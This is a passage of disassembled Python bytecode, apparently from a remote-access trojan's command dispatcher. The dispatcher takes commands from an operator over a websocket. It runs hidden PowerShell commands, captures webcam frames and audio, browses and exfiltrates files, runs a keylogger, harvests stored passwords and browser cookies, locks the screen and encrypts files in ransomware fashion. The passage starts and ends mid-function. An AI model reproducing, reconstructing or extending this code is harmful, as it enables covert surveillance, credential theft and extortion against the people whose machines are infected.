                 LOAD_ATTR               32 (SND_FILENAME)
                 LOAD_FAST                4 (winsound)
                 LOAD_ATTR               34 (SND_ASYNC)
                 BINARY_OP                7 (|)
                 CALL                     2
                 POP_TOP

 604    L14:     EXTENDED_ARG             1
                 JUMP_BACKWARD          257 (to L2)

 605    L15:     LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               42 (loads)
                 PUSH_NULL
                 LOAD_FAST                0 (raw)
                 CALL                     1
                 STORE_FAST               6 (msg)

 606             LOAD_FAST                6 (msg)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              12 ('cmd')
                 CALL                     1
                 STORE_FAST               7 (cmd)

 607             LOAD_FAST                6 (msg)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              13 ('args')
                 BUILD_MAP                0
                 CALL                     2
                 STORE_FAST               8 (a)

 608    L16:     NOP

 609    L17:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             44 (CMD_MOUSE)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       46 (to L19)

 610             LOAD_GLOBAL             47 (do_move + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              14 ('x')
                 LOAD_CONST               3 (0)
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              15 ('y')
                 LOAD_CONST               3 (0)
                 CALL                     2
                 CALL                     2
                 POP_TOP
        L18:     EXTENDED_ARG             8
                 JUMP_FORWARD          2254 (to L134)

 611    L19:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             48 (CMD_CLICK)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       46 (to L21)

 612             LOAD_GLOBAL             51 (do_click + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              16 ('btn')
                 LOAD_CONST              17 ('left')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              18 ('down')
                 LOAD_CONST               1 (True)
                 CALL                     2
                 CALL                     2
                 POP_TOP
        L20:     EXTENDED_ARG             8
                 JUMP_FORWARD          2198 (to L134)

 613    L21:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             52 (CMD_KEY)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       29 (to L23)

 614             LOAD_GLOBAL             55 (do_key + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              19 ('key')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     1
                 POP_TOP
        L22:     EXTENDED_ARG             8
                 JUMP_FORWARD          2159 (to L134)

 615    L23:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      145 (to L29)

 616             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               60 (Popen)
                 PUSH_NULL

 617             LOAD_CONST              21 ('powershell')
                 LOAD_CONST              22 ('-Command')
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              12 ('cmd')
                 LOAD_CONST              23 ('echo ok')
                 CALL                     2
                 BUILD_LIST               3

 618             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               62 (PIPE)
                 LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               64 (STDOUT)

 619             LOAD_CONST               1 (True)
                 LOAD_CONST              24 (134217728)

 616             LOAD_CONST              25 (('stdout', 'stderr', 'text', 'creationflags'))
                 CALL_KW                  5
                 STORE_FAST               9 (p)

 621             LOAD_FAST                9 (p)
                 LOAD_ATTR               67 (communicate + NULL|self)
                 LOAD_CONST              26 (30)
                 LOAD_CONST              27 (('timeout',))
                 CALL_KW                  1
                 LOAD_CONST               3 (0)
                 BINARY_SUBSCR
                 STORE_FAST              10 (out)

 622             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_FAST               10 (out)
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L24:     SEND                     3 (to L27)
        L25:     YIELD_VALUE              1
        L26:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L24)
        L27:     END_SEND
                 POP_TOP
        L28:     EXTENDED_ARG             7
                 JUMP_FORWARD          2004 (to L134)

 623    L29:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             72 (CMD_CAM)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      177 (to L49)

 624             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             37 (cv2)
                 STORE_FAST              11 (cv2)

 625             LOAD_GLOBAL             76 (_camera_lock)
                 BEFORE_ASYNC_WITH
                 GET_AWAITABLE            1
                 LOAD_CONST               0 (None)
        L30:     SEND                     3 (to L33)
        L31:     YIELD_VALUE              1
        L32:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L30)
        L33:     END_SEND
        L34:     POP_TOP

 626             LOAD_GLOBAL             79 (_open_camera + NULL)
                 CALL                     0
                 STORE_FAST              12 (cap)

 627             LOAD_FAST               12 (cap)
                 POP_JUMP_IF_NONE        19 (to L35)

 628             LOAD_FAST               12 (cap)
                 LOAD_ATTR               81 (read + NULL|self)
                 CALL                     0
                 UNPACK_SEQUENCE          2
                 STORE_FAST_STORE_FAST  222 (ret, frame)
                 JUMP_FORWARD             2 (to L36)

 630    L35:     LOAD_CONST              30 (False)
                 STORE_FAST              13 (ret)

 625    L36:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 GET_AWAITABLE            2
                 LOAD_CONST               0 (None)
        L37:     SEND                     3 (to L40)
        L38:     YIELD_VALUE              1
        L39:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L37)
        L40:     END_SEND
                 POP_TOP

 631    L41:     LOAD_FAST_CHECK         13 (ret)
                 TO_BOOL
                 POP_JUMP_IF_TRUE        23 (to L43)

 632             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              31 ('CMD_CAM: unable to grab camera frame')
                 CALL                     1
                 POP_TOP

 633             LOAD_GLOBAL             83 (_close_camera + NULL)
                 CALL                     0
                 POP_TOP
        L42:     EXTENDED_ARG             7
                 JUMP_FORWARD          1895 (to L134)

 635    L43:     LOAD_FAST               11 (cv2)
                 LOAD_ATTR               85 (imencode + NULL|self)
                 LOAD_CONST              32 ('.jpg')
                 LOAD_FAST_CHECK         14 (frame)
                 LOAD_FAST               11 (cv2)
                 LOAD_ATTR               86 (IMWRITE_JPEG_QUALITY)
                 LOAD_CONST              33 (60)
                 BUILD_LIST               2
                 CALL                     3
                 UNPACK_SEQUENCE          2
                 STORE_FAST              15 (_)
                 STORE_FAST              16 (buf)

 636             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_CONST              34 (b'\x01')
                 LOAD_FAST               16 (buf)
                 LOAD_ATTR               89 (tobytes + NULL|self)
                 CALL                     0
                 BINARY_OP                0 (+)
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L44:     SEND                     3 (to L47)
        L45:     YIELD_VALUE              1
        L46:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L44)
        L47:     END_SEND
                 POP_TOP
        L48:     EXTENDED_ARG             7
                 JUMP_FORWARD          1817 (to L134)

 637    L49:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             90 (CMD_VIEW)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      188 (to L53)

 639             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              35 ('substream')
                 CALL                     1
                 LOAD_CONST              36 ('cam')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       88 (to L51)

 640             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              37 ('enabled')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
                 STORE_GLOBAL            47 (_cam_stream_enabled)

 641             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              38 ('audio')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
                 STORE_FAST              17 (audio_requested)

 642             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              39 ('Cam substream -> ')
                 LOAD_GLOBAL             94 (_cam_stream_enabled)
                 FORMAT_SIMPLE
                 LOAD_CONST              40 (', audio -> ')
                 LOAD_FAST               17 (audio_requested)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP

 643             LOAD_GLOBAL             97 (_ensure_audio + NULL)
                 LOAD_FAST               17 (audio_requested)
                 CALL                     1
                 POP_TOP
        L50:     EXTENDED_ARG             6
                 JUMP_FORWARD          1698 (to L134)

 645    L51:     LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              41 ('mode')
                 LOAD_CONST              42 ('screen')
                 CALL                     2
                 STORE_GLOBAL            49 (_view_mode)

 646             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              38 ('audio')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
                 STORE_FAST              17 (audio_requested)

 647             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              43 ('View mode → ')
                 LOAD_GLOBAL             98 (_view_mode)
                 FORMAT_SIMPLE
                 LOAD_CONST              44 (', audio → ')
                 LOAD_FAST               17 (audio_requested)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP

 648             LOAD_GLOBAL             97 (_ensure_audio + NULL)
                 LOAD_FAST               17 (audio_requested)
                 CALL                     1
                 POP_TOP
        L52:     EXTENDED_ARG             6
                 JUMP_FORWARD          1619 (to L134)

 649    L53:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 COMPARE_OP              88 (bool(==))
                 EXTENDED_ARG             1
                 POP_JUMP_IF_FALSE      379 (to L76)

 650             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 STORE_FAST               9 (p)

 651             BUILD_LIST               0
                 STORE_FAST              18 (items)

 652             LOAD_FAST                9 (p)
                 LOAD_CONST              46 ('DRIVES')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      145 (to L63)

 653             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             51 (string)
                 STORE_FAST              19 (string)

 654             LOAD_FAST               19 (string)
                 LOAD_ATTR              104 (ascii_uppercase)
                 GET_ITER
        L54:     FOR_ITER                68 (to L57)
                 STORE_FAST              20 (c)

 655             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              107 (exists + NULL|self)
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              47 (':\\')
                 BUILD_STRING             2
                 CALL                     1
                 TO_BOOL
        L55:     POP_JUMP_IF_TRUE         2 (to L56)
                 JUMP_BACKWARD           44 (to L54)

 656    L56:     LOAD_FAST               18 (items)
                 LOAD_ATTR              109 (append + NULL|self)
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              47 (':\\')
                 BUILD_STRING             2
                 LOAD_CONST               1 (True)
                 LOAD_CONST               3 (0)
                 LOAD_CONST              48 (('name', 'is_dir', 'size'))
                 BUILD_CONST_KEY_MAP      3
                 CALL                     1
                 POP_TOP
                 JUMP_BACKWARD           70 (to L54)

 654    L57:     END_FOR
                 POP_TOP

 657             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 LOAD_CONST              46 ('DRIVES')
                 LOAD_FAST               18 (items)
                 LOAD_CONST              49 (('path', 'items'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L58:     SEND                     3 (to L61)
        L59:     YIELD_VALUE              1
        L60:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L58)
        L61:     END_SEND
                 POP_TOP
        L62:     EXTENDED_ARG             5
                 JUMP_FORWARD          1437 (to L134)

 659    L63:     LOAD_GLOBAL              8 (os)
                 LOAD_ATTR              110 (scandir)
                 PUSH_NULL
                 LOAD_FAST                9 (p)
                 CALL                     1
                 GET_ITER
        L64:     FOR_ITER                96 (to L70)
                 STORE_FAST              21 (e)

 660    L65:     NOP

 661    L66:     LOAD_FAST               18 (items)
                 LOAD_ATTR              109 (append + NULL|self)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              112 (name)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              115 (is_dir + NULL|self)
                 CALL                     0
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              115 (is_dir + NULL|self)
                 CALL                     0
                 TO_BOOL
                 POP_JUMP_IF_TRUE        26 (to L67)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              117 (stat + NULL|self)
                 CALL                     0
                 LOAD_ATTR              118 (st_size)
                 JUMP_FORWARD             1 (to L68)
        L67:     LOAD_CONST               3 (0)
        L68:     LOAD_CONST              48 (('name', 'is_dir', 'size'))
                 BUILD_CONST_KEY_MAP      3
                 CALL                     1
                 POP_TOP
        L69:     JUMP_BACKWARD           98 (to L64)

 659    L70:     END_FOR
                 POP_TOP

 664             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              121 (abspath + NULL|self)
                 LOAD_FAST                9 (p)
                 CALL                     1
                 LOAD_FAST               18 (items)
                 LOAD_CONST              49 (('path', 'items'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L71:     SEND                     3 (to L74)
        L72:     YIELD_VALUE              1
        L73:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L71)
        L74:     END_SEND
                 POP_TOP
        L75:     EXTENDED_ARG             4
                 JUMP_FORWARD          1229 (to L134)

 665    L76:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            122 (CMD_SOUND)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      250 (to L85)

 666             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              50 ('name')
                 LOAD_CONST              51 ('sound.wav')
                 CALL                     2
                 STORE_FAST              22 (name)

 667             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              52 ('bytes')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              23 (b64)

 668             LOAD_FAST               23 (b64)
                 TO_BOOL
                 POP_JUMP_IF_FALSE      205 (to L84)

 669    L77:     NOP

 670    L78:     LOAD_GLOBAL            124 (base64)
                 LOAD_ATTR              126 (b64decode)
                 PUSH_NULL
                 LOAD_FAST               23 (b64)
                 CALL                     1
                 STORE_FAST               1 (audio_data)

 671             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST              53 ('inject_')
                 LOAD_GLOBAL             18 (uuid)
                 LOAD_ATTR               20 (uuid4)
                 PUSH_NULL
                 CALL                     0
                 LOAD_ATTR               22 (hex)
                 FORMAT_SIMPLE
                 LOAD_CONST              54 ('_')
                 LOAD_FAST               22 (name)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     2
                 STORE_FAST               2 (tmp)

 672             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST                2 (tmp)
                 LOAD_CONST               9 ('wb')
                 CALL                     2
                 BEFORE_WITH
        L79:     STORE_FAST               3 (f)

 673             LOAD_FAST                3 (f)
                 LOAD_ATTR               27 (write + NULL|self)
                 LOAD_FAST                1 (audio_data)
                 CALL                     1
                 POP_TOP

 672    L80:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP

 674    L81:     NOP

 675    L82:     LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             14 (winsound)
                 STORE_FAST               4 (winsound)

 676             LOAD_FAST                4 (winsound)
                 LOAD_ATTR               31 (PlaySound + NULL|self)
                 LOAD_FAST_LOAD_FAST     36 (tmp, winsound)
                 LOAD_ATTR               32 (SND_FILENAME)
                 LOAD_FAST                4 (winsound)
                 LOAD_ATTR               34 (SND_ASYNC)
                 BINARY_OP                7 (|)
                 CALL                     2
                 POP_TOP
        L83:     EXTENDED_ARG             3
                 JUMP_FORWARD           971 (to L134)

 668    L84:     EXTENDED_ARG             3
                 JUMP_FORWARD           969 (to L134)

 681    L85:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            128 (CMD_FILE_RUN)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       40 (to L87)

 682             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR              130 (startfile)
                 PUSH_NULL
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 CALL                     1
                 POP_TOP
        L86:     EXTENDED_ARG             3
                 JUMP_FORWARD           919 (to L134)

 683    L87:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            132 (CMD_FILE_DL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      173 (to L95)

 684             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              24 (fp)

 685             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST               24 (fp)
                 LOAD_CONST              58 ('rb')
                 CALL                     2
                 BEFORE_WITH
        L88:     STORE_FAST               3 (f)

 686             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            132 (CMD_FILE_DL)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              135 (basename + NULL|self)
                 LOAD_FAST               24 (fp)
                 CALL                     1
                 LOAD_GLOBAL            124 (base64)
                 LOAD_ATTR              136 (b64encode)
                 PUSH_NULL
                 LOAD_FAST                3 (f)
                 LOAD_ATTR               81 (read + NULL|self)
                 CALL                     0
                 CALL                     1
                 LOAD_ATTR              139 (decode + NULL|self)
                 CALL                     0
                 LOAD_CONST              59 (('name', 'bytes'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L89:     SEND                     3 (to L92)
        L90:     YIELD_VALUE              1
        L91:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L89)
        L92:     END_SEND
                 POP_TOP

 685    L93:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP
        L94:     EXTENDED_ARG             2
                 JUMP_FORWARD           736 (to L134)

 687    L95:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            140 (CMD_KEYLOG)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      104 (to L105)

 688             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              60 ('action')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              25 (act)

 689             LOAD_FAST               25 (act)
                 LOAD_CONST              61 ('start')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE        4 (to L97)

 690             LOAD_CONST               1 (True)
                 STORE_GLOBAL            71 (_keylog_on)
        L96:     EXTENDED_ARG             2
                 JUMP_FORWARD           698 (to L134)

 691    L97:     LOAD_FAST               25 (act)
                 LOAD_CONST              62 ('stop')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE        4 (to L99)

 692             LOAD_CONST              30 (False)
                 STORE_GLOBAL            71 (_keylog_on)
        L98:     EXTENDED_ARG             2
                 JUMP_FORWARD           688 (to L134)

 693    L99:     LOAD_FAST               25 (act)
                 LOAD_CONST              63 ('fetch')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       58 (to L104)

 694             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            140 (CMD_KEYLOG)
                 LOAD_GLOBAL            144 (_keybuf)
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L100:     SEND                     3 (to L103)
       L101:     YIELD_VALUE              1
       L102:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L100)
       L103:     END_SEND
                 POP_TOP

 695             LOAD_CONST              20 ('')
                 STORE_GLOBAL            72 (_keybuf)

  --   L104:     EXTENDED_ARG             2
                 JUMP_FORWARD           622 (to L134)

 696   L105:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            146 (CMD_VAULT)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       62 (to L111)

 697             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            146 (CMD_VAULT)
                 LOAD_GLOBAL            149 (harvest_passwords + NULL)
                 CALL                     0
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L106:     SEND                     3 (to L109)
       L107:     YIELD_VALUE              1
       L108:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L106)
       L109:     END_SEND
                 POP_TOP
       L110:     EXTENDED_ARG             2
                 JUMP_FORWARD           550 (to L134)

 698   L111:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            150 (CMD_COOKIES)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       62 (to L117)

 699             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            150 (CMD_COOKIES)
                 LOAD_GLOBAL            153 (harvest_cookies + NULL)
                 CALL                     0
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L112:     SEND                     3 (to L115)
       L113:     YIELD_VALUE              1
       L114:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L112)
       L115:     END_SEND
                 POP_TOP
       L116:     EXTENDED_ARG             1
                 JUMP_FORWARD           478 (to L134)

 700   L117:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            154 (CMD_LOCK)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       59 (to L119)

 701             LOAD_GLOBAL            156 (threading)
                 LOAD_ATTR              158 (Thread)
                 PUSH_NULL
                 LOAD_GLOBAL            160 (do_lock)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              65 ('admin')
                 CALL                     2
                 BUILD_TUPLE              1
                 LOAD_CONST               1 (True)
                 LOAD_CONST              66 (('target', 'args', 'daemon'))
                 CALL_KW                  3
                 LOAD_ATTR              163 (start + NULL|self)
                 CALL                     0
                 POP_TOP
       L118:     EXTENDED_ARG             1
                 JUMP_FORWARD           409 (to L134)

 702   L119:     LOAD_FAST                7 (cmd)
                 LOAD_CONST              67 (33)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      104 (to L125)

 703             LOAD_GLOBAL            165 (do_encrypt + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              68 ('targets')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     2
                 STORE_FAST              20 (c)

 704             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_CONST              69 ('Encrypted ')
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              70 (' files.')
                 BUILD_STRING             3
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L120:     SEND                     3 (to L123)
       L121:     YIELD_VALUE              1
       L122:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L120)
       L123:     END_SEND
                 POP_TOP
       L124:     EXTENDED_ARG             1
                 JUMP_FORWARD           299 (to L134)

 705   L125:     LOAD_FAST                7 (cmd)
                 LOAD_CONST              71 (34)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      103 (to L131)

 706             LOAD_GLOBAL            167 (do_decrypt + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              68 ('targets')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     2
                 STORE_FAST              20 (c)

 707             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_CONST              72 ('Decrypted ')
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              70 (' files.')
                 BUILD_STRING             3
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L126:     SEND                     3 (to L129)
       L127:     YIELD_VALUE              1
       L128:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L126)
       L129:     END_SEND
                 POP_TOP
       L130:     JUMP_FORWARD           190 (to L134)

 708   L131:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            168 (CMD_URL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       39 (to L133)

 709             LOAD_GLOBAL            170 (webbrowser)
                 LOAD_ATTR               24 (open)
                 PUSH_NULL
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              73 ('url')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     1
                 POP_TOP
       L132:     JUMP_FORWARD           141 (to L134)

 710   L133:     LOAD_FAST                7 (cmd)
